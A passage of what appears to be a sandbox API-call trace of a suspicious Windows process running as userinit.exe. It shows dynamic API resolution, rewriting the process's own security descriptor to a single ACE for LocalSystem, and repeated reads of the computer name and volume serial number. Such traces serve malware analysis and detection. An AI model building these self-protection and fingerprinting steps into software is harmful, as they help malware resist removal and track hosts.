[0160.634] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x690780, TokenInformationLength=0x24, ReturnLength=0x14ea48 | out: TokenInformation=0x690780, ReturnLength=0x14ea48) returned 1
[0160.634] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fab0, pSourceSid=0x690788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a1fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.635] IsValidSid (pSid=0x2a1fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.635] ConvertSidToStringSidA () returned 0x1
[0160.635] LocalFree (hMem=0x689e80) returned 0x0
[0160.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.635] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0160.635] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fb34, pSourceSid=0x2a1fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a1fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.635] IsValidSid (pSid=0x2a1fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.635] ConvertSidToStringSidA () returned 0x1
[0160.635] LocalFree (hMem=0x689e80) returned 0x0
[0160.635] IsValidSid (pSid=0x2a1fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.635] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0160.635] CloseHandle (hObject=0x1d0) returned 1
[0160.635] ConvertStringSidToSidA () returned 0x1
[0160.636] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fa54, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a1fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0160.636] IsValidSid (pSid=0x2a1fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0160.636] ConvertSidToStringSidA () returned 0x1
[0160.636] LocalFree (hMem=0x696f58) returned 0x0
[0160.636] LocalFree (hMem=0x696f40) returned 0x0
[0160.636] ConvertStringSidToSidA () returned 0x1
[0160.636] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fae0, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a1fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0160.636] IsValidSid (pSid=0x2a1fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0160.636] ConvertSidToStringSidA () returned 0x1
[0160.636] LocalFree (hMem=0x696f58) returned 0x0
[0160.636] LocalFree (hMem=0x696f40) returned 0x0
[0160.636] ConvertStringSidToSidA () returned 0x1
[0160.636] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fbfc, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a1fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0160.636] IsValidSid (pSid=0x2a1fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0160.636] ConvertSidToStringSidA () returned 0x1
[0160.636] LocalFree (hMem=0x696f58) returned 0x0
[0160.636] LocalFree (hMem=0x696f40) returned 0x0
[0160.636] ConvertStringSidToSidA () returned 0x1
[0160.636] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fc8c, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a1fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0160.636] IsValidSid (pSid=0x2a1fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0160.636] ConvertSidToStringSidA () returned 0x1
[0160.636] LocalFree (hMem=0x696f58) returned 0x0
[0160.636] LocalFree (hMem=0x696f40) returned 0x0
[0160.636] ConvertStringSidToSidA () returned 0x1
[0160.636] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fd1c, pSourceSid=0x696f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a1fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0160.636] IsValidSid (pSid=0x2a1fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0160.636] ConvertSidToStringSidA () returned 0x1
[0160.636] LocalFree (hMem=0x696f58) returned 0x0
[0160.636] LocalFree (hMem=0x696f40) returned 0x0
[0160.636] GetCurrentProcessId () returned 0x710
[0160.637] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x710) returned 0x1d0
[0160.637] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.637] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0160.637] GetSecurityInfo () returned 0x0
[0160.640] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.640] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0160.641] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x690f28, pControl=0x14e7ea, lpdwRevision=0x14e7e4 | out: pControl=0x14e7ea, lpdwRevision=0x14e7e4) returned 1
[0160.641] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.641] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0160.641] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x690f28, pOwner=0x14e7e0, lpbOwnerDefaulted=0x14e7d4 | out: pOwner=0x14e7e0*=0x0, lpbOwnerDefaulted=0x14e7d4) returned 1
[0160.641] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.641] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0160.641] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x690f28, pGroup=0x14e7e0, lpbGroupDefaulted=0x14e7d4 | out: pGroup=0x14e7e0*=0x0, lpbGroupDefaulted=0x14e7d4) returned 1
[0160.641] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.641] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0160.641] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x690f28, lpbDaclPresent=0x14e7d8, pDacl=0x14e7cc, lpbDaclDefaulted=0x14e7d4 | out: lpbDaclPresent=0x14e7d8, pDacl=0x14e7cc, lpbDaclDefaulted=0x14e7d4) returned 1
[0160.642] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.642] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0160.642] IsValidAcl (pAcl=0x690f3c) returned 1
[0160.642] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.642] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0160.642] GetAce (in: pAcl=0x690f3c, dwAceIndex=0x0, pAce=0x14e66c | out: pAce=0x14e66c*=0x690f44) returned 1
[0160.642] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1fe74, pSourceSid=0x690f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a1fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.643] IsValidSid (pSid=0x2a1fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.643] ConvertSidToStringSidA () returned 0x1
[0160.643] LocalFree (hMem=0x697018) returned 0x0
[0160.643] GetAce (in: pAcl=0x690f3c, dwAceIndex=0x1, pAce=0x14e66c | out: pAce=0x14e66c*=0x690f5c) returned 1
[0160.643] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a1ff60, pSourceSid=0x690f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a1ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.643] IsValidSid (pSid=0x2a1ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.643] ConvertSidToStringSidA () returned 0x1
[0160.643] LocalFree (hMem=0x697018) returned 0x0
[0160.643] GetAce (in: pAcl=0x690f3c, dwAceIndex=0x2, pAce=0x14e66c | out: pAce=0x14e66c*=0x690f70) returned 1
[0160.643] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a129c0, pSourceSid=0x690f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a129c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0160.643] IsValidSid (pSid=0x2a129c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0160.643] ConvertSidToStringSidA () returned 0x1
[0160.643] LocalFree (hMem=0x697018) returned 0x0
[0160.643] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.643] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0160.643] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x690f28, lpbSaclPresent=0x14e7dc, pSacl=0x14e7d0, lpbSaclDefaulted=0x14e7d4 | out: lpbSaclPresent=0x14e7dc, pSacl=0x14e7d0, lpbSaclDefaulted=0x14e7d4) returned 1
[0160.643] LocalFree (hMem=0x690f28) returned 0x0
[0160.643] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.643] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.644] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0160.644] GetLengthSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0160.644] GetLastError () returned 0x0
[0160.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.644] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0160.644] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.644] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0160.644] InitializeAcl (in: pAcl=0x697fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x697fa8) returned 1
[0160.644] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.644] GetLengthSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0160.644] GetLastError () returned 0x0
[0160.644] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.645] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.645] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0160.645] SetLastError (dwErrCode=0x0)
[0160.645] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.645] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0160.645] GetSidSubAuthorityCount (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a1f615
[0160.645] GetLastError () returned 0x0
[0160.645] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.645] SetLastError (dwErrCode=0x0)
[0160.645] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.645] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0160.645] GetSidIdentifierAuthority (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a1f616
[0160.646] GetLastError () returned 0x0
[0160.646] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.646] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.646] SetLastError (dwErrCode=0x0)
[0160.646] GetSidSubAuthorityCount (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a1f615
[0160.646] GetLastError () returned 0x0
[0160.646] SetLastError (dwErrCode=0x0)
[0160.646] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.646] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0160.646] GetSidSubAuthority (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a1f61c
[0160.646] GetLastError () returned 0x0
[0160.646] IsValidSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.646] GetLengthSid (pSid=0x2a1f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0160.646] GetLastError () returned 0x0
[0160.646] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.646] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0160.646] AddAce (in: pAcl=0x697fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x682f90, nAceListLength=0x14 | out: pAcl=0x697fa8) returned 1
[0160.647] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.647] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0160.647] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.647] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0160.647] SetSecurityInfo () returned 0x0
[0160.647] CloseHandle (hObject=0x1d0) returned 1
[0160.647] GetComputerNameA (in: lpBuffer=0x2a1fd84, nSize=0x14eaa4 | out: lpBuffer="CRH2YWU7", nSize=0x14eaa4) returned 1
[0160.648] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.648] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.648] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e998, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.648] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.649] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e998, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.649] VirtualAlloc (lpAddress=0x2a20000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a20000
[0160.649] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.649] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.649] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.649] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.650] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.650] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.650] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.650] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.650] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.650] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.650] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.651] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.651] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.651] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.651] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ea8c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14eaa0, lpMaximumComponentLength=0x14ea9c, lpFileSystemFlags=0x14ea98, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14eaa0*=0x90c08a66, lpMaximumComponentLength=0x14ea9c*=0xff, lpFileSystemFlags=0x14ea98*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.651] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14e990, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
